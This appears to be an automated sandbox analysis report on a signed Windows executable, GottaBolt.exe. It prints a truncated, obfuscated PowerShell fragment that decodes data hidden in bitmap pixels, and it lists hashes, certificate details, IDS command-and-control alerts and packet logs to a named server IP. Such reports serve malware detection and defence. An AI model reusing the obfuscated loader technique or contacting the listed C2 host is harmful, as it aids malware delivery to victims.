                                                                Preview:Add-Type -AssemblyName System.Drawing...Add-Type -AssemblyName System......Function vjxyLpNkowWzxlobVAii {...[CmdletBinding()]... param(... [Parameter(Mandatory=$true)] [String]$GHF,... [Parameter(Mandatory=$true)] [String]$bts... )......$cqySVtDOOmEiPYsNAWMW = [System.Drawing.Bitmap]::FromFile((Resolve-Path $GHF).ProviderPath)...$ZUdZaJZquKQcpBOTOoTW = ""...$REmOYzmabRsWjIrLTkQT = [System.Text.StringBuilder]::new()...for ($RQNECTfFTFLXJJwRyzax = 0; $RQNECTfFTFLXJJwRyzax -le $cqySVtDOOmEiPYsNAWMW.Height-1; $RQNECTfFTFLXJJwRyzax++){... for ($jlcUbqlDwCGvKKQNFaNF = 0; $jlcUbqlDwCGvKKQNFaNF -le $cqySVtDOOmEiPYsNAWMW.Width-1; $jlcUbqlDwCGvKKQNFaNF++){... $JFWMYdLLHTsJIdhevmem = $cqySVtDOOmEiPYsNAWMW.GetPixel($jlcUbqlDwCGvKKQNFaNF,$RQNECTfFTFLXJJwRyzax)... $hDUeYONrodzpwmbYPrWS = [System.Drawing.ColorTranslator]::ToHtml($JFWMYdLLHTsJIdhevmem)... $hDUeYONrodzpwmbYPrWS = $hDUeYONrodzpwmbYPrWS.replace("#000000","")... [void]$REmOYzmabRsWjIrLTkQT.Append($hDUeYONrodzpwmb
                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):6.503980671997943
                                                                TrID:
                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                File name:GottaBolt.exe
                                                                File size:25'560 bytes
                                                                MD5:981c56e26ae89a9190d1f1db9d2683ce
                                                                SHA1:43a46c1736a4f9f5264dab79761b44e2ea0cc18c
                                                                SHA256:79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
                                                                SHA512:444c9d6bd90ef779493b13f1b966c684ac95d8d0f3065b02a2e0853fd9cca5afaed98808acb01f6e5c8d760a432e4450165089037cc86b802bb3549ae8b55a8c
                                                                SSDEEP:384:pVCnS83YG0Chg4thBMXIwTiiFLfVm3bIncwVJC2FpfhCm/iWD:5zFChgVWiFwkn7q2FGK/
                                                                TLSH:36B26D52BEA8C365DA764F71D8F201120E72EEAB5871D99D28C4B0455DF37827A13A3C
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...F.W..........."...0..,............... .....@..... ...............................X....`...@......@............... .....
                                                                Icon Hash:5d7d6d5c737b0b13
                                                                Entrypoint:0x140000000
                                                                Entrypoint Section:
                                                                Digitally signed:true
                                                                Imagebase:0x140000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x9557AA46 [Tue May 25 10:13:26 2049 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:
                                                                Signature Valid:true
                                                                Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                Signature Validation Error:The operation completed successfully
                                                                Error Number:0
                                                                Not Before, Not After
                                                                • 11/11/2024 17:44:37 11/11/2025 11:55:28
                                                                Subject Chain
                                                                • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=INDCARE AFRICA LIMITED, SERIALNUMBER=CPR/2009/10319, O=INDCARE AFRICA LIMITED, L=Nairobi, C=KE
                                                                Version:3
                                                                Thumbprint MD5:94B8889ECAB18DBC7A0FE22A3EFB1EC9
                                                                Thumbprint SHA-1:643F5BE0BC3ED89ADE028AAF7AA5D50B84C50E8F
                                                                Thumbprint SHA-256:1CB573AB94C9AFE77CAEF2718FD4ECCEAFFF3A7B0AA0BBC56B5D3C792BC58B92
                                                                Serial:69C55475FFD7B1A2474296E14C5CF8D9
                                                                Instruction
                                                                dec ebp
                                                                pop edx
                                                                nop
                                                                add byte ptr [ebx], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1768.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x46000x1dd8
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x49800x38.text
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x2a300x2c006b7fab5f38c02d4b87ba53c166f0c89cFalse0.5116299715909091data5.487360602684014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x60000x17680x1800e2e8d24ecac2dfbfaed968d5b69faa65False0.5139973958333334data5.51672574409712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x61000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5539399624765479
                                                                RT_GROUP_ICON0x71b80x14data1.1
                                                                RT_VERSION0x71dc0x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.40308370044052866
                                                                RT_MANIFEST0x75780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-22T17:11:47.153718+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.54971877.91.73.101443TCP
                                                                2024-11-22T17:11:49.665986+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54971977.91.73.101443TCP
                                                                2024-11-22T17:11:49.665986+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.54971977.91.73.101443TCP
                                                                2024-11-22T17:11:52.199191+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54972077.91.73.101443TCP
                                                                2024-11-22T17:11:52.199191+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.54972077.91.73.101443TCP
                                                                2024-11-22T17:11:54.709108+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54972277.91.73.101443TCP
                                                                2024-11-22T17:11:54.709108+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.54972277.91.73.101443TCP
                                                                2024-11-22T17:11:57.233457+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.54972977.91.73.101443TCP
                                                                2024-11-22T17:11:57.233457+01002056491ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)1192.168.2.54972977.91.73.101443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 22, 2024 17:11:45.116569042 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:45.116640091 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:45.116708040 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:45.141577959 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:45.141594887 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:46.586322069 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:46.586402893 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:46.590002060 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:46.590012074 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:46.590331078 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:46.633641958 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:46.645217896 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:46.687364101 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:47.153736115 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:47.153811932 CET4434971877.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:47.153960943 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:47.167503119 CET49718443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:47.682136059 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:47.682209015 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:47.682275057 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:47.682708025 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:47.682725906 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:49.110991955 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:49.116015911 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:49.116034031 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:49.666012049 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:49.666099072 CET4434971977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:49.666277885 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:49.667010069 CET49719443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:50.212728977 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:50.212802887 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:50.212886095 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:50.213251114 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:50.213265896 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:51.644912958 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:51.646565914 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:51.646605015 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:52.199234962 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:52.199330091 CET4434972077.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:52.199652910 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:52.199934959 CET49720443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:52.712506056 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:52.712631941 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:52.712729931 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:52.713021040 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:52.713064909 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.153199911 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.155042887 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:54.155071974 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.709125996 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.709147930 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.709216118 CET4434972277.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:54.709213972 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:54.709273100 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:54.709772110 CET49722443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:55.228553057 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:55.228599072 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:55.228689909 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:55.229590893 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:55.229607105 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:56.676675081 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:56.678353071 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:56.678386927 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:57.233639956 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:57.233855963 CET4434972977.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:11:57.233931065 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:11:57.239975929 CET49729443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:01.860649109 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:01.860661030 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:01.860732079 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:01.863651037 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:01.863667965 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.293415070 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.293512106 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:03.295532942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:03.295547009 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.295866013 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.302592993 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:03.347326994 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.931538105 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.931567907 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.931585073 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.931678057 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:03.931700945 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:03.931750059 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.088020086 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.088107109 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.088121891 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.088140011 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.088175058 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.088192940 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.134751081 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.134798050 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.134845018 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.134862900 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.134902954 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.134929895 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.276416063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.276443005 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.276525974 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.276542902 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.276581049 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.308881998 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.308907986 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.308967113 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.308979988 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.309017897 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.309039116 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.338891983 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.338958025 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.338979006 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.338995934 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.339021921 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.339037895 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.467852116 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.467876911 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.467948914 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.467967987 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.468010902 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.494884968 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.494911909 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.494980097 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.494997025 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.495024920 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.495043039 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.512448072 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.512470007 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.512563944 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.512577057 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.512613058 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.536360979 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.536391020 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.536464930 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.536478996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.536562920 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.556890011 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.556911945 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.557018042 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.557033062 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.557069063 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.659533024 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.659558058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.659637928 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.659658909 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.659857988 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.674252987 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.674293041 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.674335003 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.674345016 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.674384117 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.688054085 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.688093901 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.688136101 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.688148975 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.688189983 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.688210011 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.703155994 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.703224897 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.703252077 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.703267097 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.703294039 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.703324080 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.717688084 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.717721939 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.717801094 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.717813015 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.717842102 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.717866898 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.731616020 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.731664896 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.731699944 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.731714010 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.731759071 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.746407032 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.746424913 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.746495008 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.746507883 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.746551991 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.758889914 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.758923054 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.758974075 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.758984089 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.759022951 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.859973907 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.859996080 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.860083103 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.860106945 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.860146999 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.870007992 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.870028019 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.870086908 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.870100975 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.870140076 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.881824017 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.881880999 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.881907940 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.881922007 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.881952047 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.881970882 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.893520117 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.893565893 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.893603086 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.893618107 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.893650055 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.893673897 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.902751923 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.902822018 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.902838945 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.902852058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.902882099 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.902904034 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.912748098 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.912792921 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.912825108 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.912837982 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.912878990 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.921072006 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.921118021 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.921159029 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.921169996 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.921195984 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.921219110 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.930151939 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.930201054 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.930314064 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.930314064 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:04.930325031 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:04.930468082 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.060224056 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.060271025 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.060314894 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.060333967 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.060364962 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.060383081 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.068057060 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.068085909 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.068130016 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.068142891 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.068172932 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.068190098 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.077115059 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.077145100 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.077198029 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.077210903 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.077234030 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.077255964 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.086029053 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.086059093 CET4434974477.91.73.101192.168.2.5
